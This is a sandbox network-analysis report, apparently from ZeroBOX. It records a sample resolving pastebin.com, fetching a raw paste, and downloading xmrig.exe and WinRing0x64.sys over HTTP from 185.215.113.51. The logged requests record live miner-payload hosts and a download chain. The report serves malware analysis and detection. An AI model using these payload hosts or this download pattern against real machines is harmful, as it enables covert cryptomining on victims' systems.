popup
NetWork | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Network Analysis

Download pcap
Hosts 3 DNS 1 TCP 3 UDP 4 HTTP(S) 3 ICMP 0 IRC 0 Suricata Snort
IP Address Status Action
164.124.101.2 Active Moloch
172.67.19.24 Active Moloch
185.215.113.51 Active Moloch
Name Response Post-Analysis Lookup
pastebin.com
A 172.67.19.24
A 104.20.4.235
A 104.20.3.235
172.67.19.24
GET 200 https://pastebin.com/raw/YpJeSRBC
REQUEST
: GET /raw/YpJeSRBC HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
RESPONSE
: HTTP/1.1 200 OK
Date: Mon, 27 Jan 2025 07
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: EXPIRED
Last-Modified: Mon, 27 Jan 2025 07
Server: cloudflare
CF-RAY: 908719922fa129e0-FUK
BODY 

            

        


    



        
        
            

    
        GET
        
        200
        http://185.215.113.51/xmrig.exe
        
    
    


        

            

                
 REQUEST

                

                    
                    

	
			

				:
				GET /xmrig.exe HTTP/1.1
			

			

				Host:
				 185.215.113.51
			

			

				Connection:
				 Keep-Alive
			

	


                

            

            

                
 RESPONSE

                

                    
                    

	
			

				:
				HTTP/1.1 200 OK
			

			

				Server:
				 nginx/1.18.0 (Ubuntu)
			

			

				Date:
				 Mon, 27 Jan 2025 07
			

			

				Content-Type:
				 application/octet-stream
			

			

				Content-Length:
				 8251392
			

			

				Last-Modified:
				 Wed, 15 Jan 2025 19
			

			

				Connection:
				 keep-alive
			

			

				ETag:
				 "678808cd-7de800"
			

			

				Accept-Ranges:
				 bytes
			

	


                

            

        


        

            

                 BODY
                
            

            

                

            

        


    



        
            

    
        GET
        
        200
        http://185.215.113.51/WinRing0x64.sys
        
    
    


        

            

                
 REQUEST

                

                    
                    

	
			

				:
				GET /WinRing0x64.sys HTTP/1.1
			

			

				Host:
				 185.215.113.51
			

			

				Connection:
				 Keep-Alive
			

	


                

            

            

                
 RESPONSE

                

                    
                    

	
			

				:
				HTTP/1.1 200 OK
			

			

				Server:
				 nginx/1.18.0 (Ubuntu)
			

			

				Date:
				 Mon, 27 Jan 2025 07
			

			

				Content-Type:
				 application/octet-stream
			

			

				Content-Length:
				 14544
			

			

				Last-Modified:
				 Wed, 15 Jan 2025 19
			

			

				Connection:
				 keep-alive
			

			

				ETag:
				 "678808cc-38d0"
			

			

				Accept-Ranges:
				 bytes
			

	


                

            

        


        

            

                 BODY
                
            

            

                

            

        


    



        
	




                            
ICMP traffic



No ICMP traffic performed.



                            
IRC traffic



No IRC requests performed.



                            
Suricata Alerts


    
No Suricata Alerts




Suricata TLS


    
No Suricata TLS




                            
Snort Alerts


    
No Snort Alerts